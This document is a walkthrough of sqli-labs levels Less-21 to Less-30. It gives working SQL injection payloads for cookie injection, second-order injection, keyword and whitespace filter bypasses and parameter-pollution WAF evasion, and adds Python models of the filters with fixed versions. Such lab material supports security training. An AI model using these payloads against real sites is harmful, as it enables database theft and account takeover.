Less-21 Cookie Injection- Error Based- complex – string
Log in with username=admin&password=admin; the login succeeds.
The response sets a cookie whose value base64-decodes to admin, so the cookie is simply the login username base64-encoded, and the page feeds it back into its query. Testing shows the value is wrapped as ('...'), so the payload has to close both the quote and the parenthesis with '). Build it as follows:
admin') order by 1 #
base64:
YWRtaW4nKSBvcmRlciBieSAxICM=
Send the cookie to the page; here HackBar (a Firefox add-on) is used to set it.
order by 4 raises an error, so the column count is 3. Now a union query:
admin') and 1=2 union select 1,2,3#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLDIsMyM=
All three positions 1, 2, 3 are echoed, so each column can carry output.
Dump the database name and the table names (the remaining lessons are only taken as far as this step):
admin') and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCBncm91cF9jb25jYXQodGFibGVfbmFtZSksZGF0YWJhc2UoKSx2ZXJzaW9uKCkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==
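As an added example (not part of the original writeup), the following Python reproduces the cookie handling of Less-21 and Less-22: it encodes a raw payload the way HackBar sends it, decodes it the way the PHP side does, and shows the final SQL string, which makes the ') closure visible. The two query templates are assumptions modelled on the lab's source; the base64 values it produces match the ones listed above.

```python
import base64

# Added example, not from the original writeup. Assumption: the query
# templates mirror how Less-21 / Less-22 embed the decoded uname cookie
# (SELECT * FROM users WHERE username=('$cookee') / ="$cookee").
TEMPLATES = {
    "less21": "SELECT * FROM users WHERE username=('{}') LIMIT 0,1",
    "less22": 'SELECT * FROM users WHERE username="{}" LIMIT 0,1',
}
CLOSERS = {"less21": "')", "less22": '"'}   # what the payload must close first


def encode_cookie(payload: str) -> str:
    """Cookie value for a raw payload, i.e. what HackBar sends as uname=..."""
    return base64.b64encode(payload.encode()).decode()


def decode_cookie(cookie: str) -> str:
    """What the page sees after base64_decode($_COOKIE['uname'])."""
    return base64.b64decode(cookie).decode()


def server_query(level: str, cookie: str) -> str:
    """The SQL string the page executes for a given cookie value."""
    return TEMPLATES[level].format(decode_cookie(cookie))


def order_by_probes(level: str, max_cols: int = 5) -> list:
    """Cookies for ORDER BY 1..max_cols. The first one that errors means the
    column count is one less. The trailing # comments out the page's own closer."""
    closer = CLOSERS[level]
    return [encode_cookie(f"admin{closer} order by {n} #") for n in range(1, max_cols + 1)]


def union_probe(level: str, columns: int) -> str:
    """Cookie for UNION SELECT 1..columns, to see which positions are echoed."""
    nums = ",".join(str(n) for n in range(1, columns + 1))
    return encode_cookie(f"admin{CLOSERS[level]} and 1=2 union select {nums}#")


if __name__ == "__main__":
    for cookie in order_by_probes("less21", 4):
        print(cookie, "->", server_query("less21", cookie))
    print(union_probe("less21", 3))
```

Running it prints the same base64 strings as above and, next to each, the statement MySQL actually receives, e.g. SELECT * FROM users WHERE username=('admin') order by 1 #') LIMIT 0,1: the injected ') closes the lab's own ('...') and the # swallows the leftover.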
Less-22 Cookie Injection- Error Based- Double Quotes – string
Compared with Less-21, the statement is closed with a double quote instead of '); everything else is the same. Modified payload:
admin" and 1=2 union select group_concat(table_name),database(),version() from information_schema.tables where table_schema=database()#
base64:
YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSxkYXRhYmFzZSgpLHZlcnNpb24oKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPWRhdGFiYXNlKCkj
This dumps the database name and the tables.
Less-23 Error Based- no comments
Test a single quote: error.
Try other characters: # (%23).
The # is evidently replaced with an empty string on the backend (in the error message the two single quotes sit directly next to each other).
Now try the -- single-line comment.
The error only reports the single quote before LIMIT, meaning the quotes before it paired up, so -- is presumably replaced with an empty string as well.
Checking the source confirms it: both # and -- are stripped.
So the statement has to be closed rather than commented out. Payload:
http://localhost/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'
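Added example, not from the original writeup: a Python model of the Less-23 filter, run against an in-memory SQLite database standing in for MySQL. It shows why a comment-terminated payload breaks once # and -- are stripped, and why closing the statement with a trailing ' works: the injected ' joins the page's own closing ' to form '', which both MySQL and SQLite read as an empty column alias, so the quote count stays balanced. The two regexes and the users table are assumptions; sqlite_master and sqlite_version() take the place of information_schema.tables and database().

```python
import re
import sqlite3

# Added example, not from the original writeup. Less-23 strips '#' and '--'
# with two preg_replace() calls (assumption: reconstructed from the lab's
# source); SQLite stands in for MySQL here.
TEMPLATE = "SELECT * FROM users WHERE id='{}' LIMIT 0,1"


def less23_filter(user_id: str) -> str:
    """Remove every '#' and every '--', one pass each, like preg_replace(..., '')."""
    user_id = re.sub(r"#", "", user_id)
    user_id = re.sub(r"--", "", user_id)
    return user_id


def build_query(user_id: str) -> str:
    """The SQL string index.php ends up with for a given ?id= value."""
    return TEMPLATE.format(less23_filter(user_id))


def run(user_id: str):
    """Execute the built query on a throwaway users table (constructed sample rows).

    Returns the result rows, or the database's error message as a string.
    """
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
        conn.execute("INSERT INTO users VALUES (1, 'Dumb', 'Dumb'), (2, 'Angelina', 'I-kill-you')")
        return conn.execute(build_query(user_id)).fetchall()
    except sqlite3.Error as exc:
        return str(exc)
    finally:
        conn.close()


# Comment-terminated payload: the marker is removed, so the server's closing
# quote is left dangling and the statement no longer parses.
COMMENTED = "-1' union select 1,2,3 -- "
# Quote-closing payload in the style of the one above: the trailing ' pairs
# with the server's own ' to give '', an empty column alias.
CLOSED = ("-1' union select 1,(select group_concat(name) from sqlite_master "
          "where type='table'),sqlite_version()'")

if __name__ == "__main__":
    print(build_query(COMMENTED))
    print(run(COMMENTED))      # error: unterminated string
    print(build_query(CLOSED))
    print(run(CLOSED))         # [(1, 'users', '3.x.y')]
```

The same balancing idea is why the Less-29 and Less-30 payloads further down also end in ' and " respectively rather than in a comment.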
Less-24 – Second Degree Injections
A second-order injection. First audit the files:
login.php (escapes the username and password)
login_create.php
pass_change.php
When the password is changed, the SQL statement uses the username stored in the SESSION, without escaping it again. So a username that contains a comment marker comments out the rest of the statement, and the current-password check is simply skipped.
For example an account named admin' -- (with a space after the --): the ' is escaped to \' during registration, but what lands in the database is a plain '.
Create the special user admin' -- with an arbitrary password, 1234 here.
Check in the database that it was created.
Change the password.
Looking in the database, admin's password has been changed.
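Added example (not the lab's own code): the Less-24 flow modelled in Python with SQLite. Registration stores the username through a parameterised INSERT, standing in for mysql_real_escape_string(), the vulnerable pass_change concatenates the username it reads back from the session, and a fixed version binds all three values. Table layout and the exact query shapes are assumptions.

```python
import sqlite3

# Added example, not the lab's own code. A minimal model of sqli-labs Less-24
# (assumptions: table layout and the exact query shapes). SQLite stands in
# for MySQL; the parameterised INSERT plays the role of
# mysql_real_escape_string() in login_create.php.


def new_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin')")  # constructed victim row
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    """login_create.php: escaping the INSERT is correct, but the value that
    lands in the table is the raw string, quote included."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def change_password_vulnerable(conn, session_user: str, current_pw: str, new_pw: str) -> int:
    """pass_change.php: the username comes from $_SESSION and is trusted.
    With session_user = "admin' -- " the statement becomes
      UPDATE users SET password='...' WHERE username='admin' -- ' AND password='...'
    so the current-password check is commented out. Returns rows updated."""
    sql = ("UPDATE users SET password='{}' WHERE username='{}' AND password='{}'"
           .format(new_pw, session_user, current_pw))
    return conn.execute(sql).rowcount


def change_password_fixed(conn, session_user: str, current_pw: str, new_pw: str) -> int:
    """Same logic with every value bound; the stored quote is just data."""
    return conn.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_pw, session_user, current_pw),
    ).rowcount


def password_of(conn, username: str) -> str:
    return conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()[0]


def attack(fixed: bool = False) -> dict:
    """Register admin' -- , log in as it (the session now holds that name),
    then call pass_change with a wrong current password."""
    conn = new_db()
    attacker = "admin' -- "           # note the trailing space after --
    register(conn, attacker, "1234")
    change = change_password_fixed if fixed else change_password_vulnerable
    updated = change(conn, attacker, "not-the-real-current-password", "pwned")
    return {
        "rows_updated": updated,
        "admin_password": password_of(conn, "admin"),
        "attacker_password": password_of(conn, attacker),
    }


if __name__ == "__main__":
    print(attack())            # admin's password becomes 'pwned'
    print(attack(fixed=True))  # nothing updated, admin's password unchanged
```

The point the model makes is that escaping at the input boundary is not the same as treating stored data as untrusted: the registration step is correct, and the bug lives entirely in the later query that rebuilds SQL from a value the application itself put into the session.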
Less-25 Trick with OR & AND
Passing or and and as parameters, the hint shows they are filtered out.
Bypass by doubling the keyword (anandd, infoorrmation): the filter runs once, so removing the inner match leaves and / information behind.
The equivalent operators || and && also bypass it (&& has to be URL-encoded).
Payload:
http://localhost/sqli-labs-master/Less-25/?id=1' anandd 1=2 union select 1,database(),group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --%20
Less-25a Trick with OR & AND Blind
Same as Less-25, but with error reporting turned off.
Put or / and in front of the id value to test whether they are filtered; otherwise no different from Less-25.
Less-26 Trick with comments
Looking at the source, a lot is filtered.
Because the multi-line comment /**/ is filtered, it cannot stand in for the space; use %a0 instead. (Whether MySQL accepts the 0xA0 byte as whitespace depends on the server version and connection charset, so check it in your own environment.)
Payload:
http://localhost/sqli-labs-master/Less-26/?id=1'%a0anandd%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()),database()'
Less-26a Trick with comments Blind
Same as Less-26 with error reporting turned off; test the filters the same way, everything else is identical.
Confirm that # is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=%231
Confirm that or is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=or1
Confirm that the multi-line comment is filtered:
http://localhost/sqli-labs-master/Less-26a/?id=/*1
Confirm that the single-line comment is filtered:
http://localhost/sqli-labs-master/Less-26/?id=--1
Confirm that the slash is filtered:
http://localhost/sqli-labs-master/Less-26/?id=/1
Confirm that the backslash is filtered:
http://localhost/sqli-labs/Less-26/?id=1\
Confirm that the space is filtered (judged from the error message):
http://localhost/sqli-labs/Less-26/?id=1' ' '
Less-27 Trick with SELECT & UNION
It is easy to see that this is a single-quote injection and that the space is filtered.
Look at the source.
The keyword filter is not strict (it only matches a fixed list of spellings), so mixed case bypasses it:
http://localhost/sqli-labs-master/Less-27/?id=1'%a0and%a01=2%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()'
Less-27a Trick with SELECT & UNION Blind
Double-quote injection; the principle is the same.
payload:
http://localhost/sqli-labs-master/Less-27a/?id=1"%a0and%a0(length(database())>8)%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()"
Less-28 Trick with SELECT & UNION
Look at the source.
union and select are matched with the i (case-insensitive) flag, with \s between them to catch the whitespace, but %a0 still gets through because \s does not match the 0xA0 byte. The SQL statement here is closed with ('). The payload ends in ('database() so that the server's own ') closes it, which means the third column displays the literal string database() rather than the database name; the table list in the second column is what we want.
payload:
http://localhost/sqli-labs-master/Less-28/?id=1')%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()
Less-28a Trick with SELECT & UNION Blind
Same blind technique as above; payload:
http://localhost/sqli-labs-master/Less-28a/?id=1')%a0and%a0(length(database())>8)%a0union%a0select%a01,(select%a0group_concat(table_name)%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()
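Added example, not from the original writeup, covering the filter bypasses of Less-25 through Less-28a in one place. Each chain below reproduces the preg_replace() sequence of one level as reconstructed from the sqli-labs source (the exact regex list is an assumption), applied to the URL-decoded ?id= values given above. The filters run on bytes, as PHP does: a bytes \s in Python only matches ASCII whitespace, the same as PCRE without the /u flag, which is exactly why %a0 survives the Less-26 and Less-28 filters while a plain space or a %0a does not. This only demonstrates the filter side; whether MySQL then treats 0xA0 as a token separator depends on the server version and connection charset.

```python
import re
from urllib.parse import unquote_to_bytes

# Added example, not from the original writeup. Each chain reproduces the
# preg_replace('...', '', $id) sequence of one level, reconstructed from the
# sqli-labs source (assumption: the exact regex list). The filters run on
# bytes, as PHP does: in a bytes pattern \s only matches ASCII whitespace,
# the same as PCRE without /u, so the 0xA0 byte sent as %a0 is untouched.


def chain(*steps):
    """Build a filter that applies each (pattern, flags) once, in order."""
    regexes = [re.compile(pattern, flags) for pattern, flags in steps]

    def apply(data: bytes) -> bytes:
        for rx in regexes:
            data = rx.sub(b"", data)      # one pass per pattern, never re-run
        return data
    return apply


FILTERS = {
    # Less-25 / 25a: or and and, case-insensitive; a doubled keyword survives
    "less25": chain((rb"or", re.I), (rb"and", re.I)),
    # Less-26 / 26a: plus '/', '*', '-', '#', ASCII whitespace and '\'
    "less26": chain((rb"or", re.I), (rb"and", re.I), (rb"[/*]", 0), (rb"-", 0),
                    (rb"#", 0), (rb"\s", 0), (rb"[/\\]", 0)),
    # Less-27 / 27a: comments, ' ' and '+', then fixed spellings of the keywords
    "less27": chain((rb"[/*]", 0), (rb"-", 0), (rb"#", 0), (rb"[ +]", 0),
                    (rb"select", 0), (rb"union", 0), (rb"UNION", 0), (rb"SELECT", 0),
                    (rb"Union", 0), (rb"Select", 0)),
    # Less-28 / 28a: comments, ' ' and '+', then union<whitespace>select in any case
    "less28": chain((rb"[/*]", 0), (rb"-", 0), (rb"#", 0), (rb"[ +]", 0),
                    (rb"union\s+select", re.I)),
}

# The ?id= values from the payloads above, still URL-encoded as the browser sends them.
PAYLOADS = {
    "less25": "1' anandd 1=2 union select 1,database(),group_concat(table_name) "
              "from infoorrmation_schema.tables where table_schema=database() --%20",
    "less26": "1'%a0anandd%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)"
              "%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()),database()'",
    "less27": "1'%a0and%a01=2%a0uNion%a0sElect%a01,(sElect%a0group_concat(table_name)"
              "%a0from%a0information_schema.tables%a0where%a0table_schema=database()),database()'",
    "less28": "1')%a0and%a01=2%a0union%a0select%a01,(select%a0group_concat(table_name)"
              "%a0from%a0information_schema.tables%a0where%a0table_schema=database()),('database()",
}


def after_filter(level: str, url_value: str) -> bytes:
    """The bytes that end up inside the SQL string for a given ?id= value."""
    return FILTERS[level](unquote_to_bytes(url_value))


def naive_attempts() -> dict:
    """The same ideas written the obvious way, to see exactly what each filter eats."""
    return {
        "less25_plain_and": after_filter("less25", "1' and 1=2 -- "),
        "less26_real_spaces": after_filter("less26", "1' anandd 1=2 -- "),
        "less27_lowercase": after_filter("less27", "1'%a0union%a0select%a01,2,3"),
        "less28_newline": after_filter("less28", "1')%0aunion%0aselect%0a1,2,3"),
    }


if __name__ == "__main__":
    for level, value in PAYLOADS.items():
        print(level, after_filter(level, value))
    for name, result in naive_attempts().items():
        print(name, result)
```

Reading the output side by side shows the four tricks: Less-25 turns anandd into and and infoorrmation into information because each pattern is applied once; Less-26 strips every ASCII space but leaves 0xA0 alone; Less-27 only knows six spellings of union/select, so uNion and sElect pass; Less-28's union\s+select removes union%0aselect but not union%a0select.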
Less-29 Protection with WAF
Set up the Tomcat environment. Entering a single quote produces an error and a redirect to another page.
https://blog.csdn.net/nzjdsds/article/details/77758824
Following that article, the WAF can be bypassed by sending id twice (HTTP parameter pollution): the Java front end on Tomcat validates the first id value it sees, while PHP's $_GET keeps the last one, so the second value is what reaches the query.
payload:
http://localhost:8080/sqli-labs-master/Less-29/?id=8&id=8' and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()'
Less-30 WAF PROTECT
Same principle as Less-29, except the query is now closed with double quotes (").
payload:
http://localhost:8080/sqli-labs-master/Less-30/?id=8&id=8" and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,5),database()"
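Added example, not from the original writeup, for the Less-29 and Less-30 bypass: a Python model of the two parsers disagreeing about a repeated id parameter. It assumes the Java side reads the first occurrence (ServletRequest.getParameter), PHP's $_GET keeps the last, and the WAF rule is "id must be an integer"; the query templates follow the closures used in the two payloads above. The last function is the obvious fix: refuse repeated parameters instead of picking one.

```python
from urllib.parse import parse_qs

# Added example, not from the original writeup. Models the Less-29 / Less-30
# chain: a Java front end on Tomcat checks ?id= and forwards the unchanged
# query string to PHP. Assumptions: the Java side reads the FIRST value of a
# repeated parameter (ServletRequest.getParameter), PHP's $_GET keeps the LAST,
# and the WAF's rule is "id must be an integer".
TEMPLATES = {
    "less29": "SELECT * FROM users WHERE id='{}' LIMIT 0,1",
    "less30": 'SELECT * FROM users WHERE id="{}" LIMIT 0,1',
}


def id_values(query: str) -> list:
    """Every id= occurrence, in order, as Python sees the raw query string."""
    return parse_qs(query, keep_blank_values=True).get("id", [])


def waf_sees(query: str) -> str:
    """Tomcat: getParameter("id") returns the first occurrence."""
    return id_values(query)[0]


def php_sees(query: str) -> str:
    """PHP: $_GET['id'] is the last occurrence."""
    return id_values(query)[-1]


def waf_allows(query: str) -> bool:
    """The lab's check as the Java side applies it: only the first id is inspected."""
    return waf_sees(query).isdigit()


def sql_executed(level: str, query: str) -> str:
    """What reaches MySQL once the WAF has let the request through."""
    return TEMPLATES[level].format(php_sees(query))


def waf_allows_strict(query: str) -> bool:
    """Fix: refuse repeated parameters and validate the single value, so the
    WAF and the backend cannot disagree about which id is in play."""
    values = id_values(query)
    return len(values) == 1 and values[0].isdigit()


if __name__ == "__main__":
    q = "id=8&id=8' and 1=2 union select 1,2,3'"
    print(waf_allows(q), waf_sees(q))          # True 8
    print(sql_executed("less29", q))           # ... WHERE id='8' and 1=2 union select 1,2,3'' LIMIT 0,1
    print(waf_allows_strict(q))                # False
```

The general lesson is that any filter sitting in front of a different runtime has to parse the request the way that runtime does, or reject anything ambiguous; first-wins versus last-wins on duplicate keys is the classic disagreement, and the strict variant closes it.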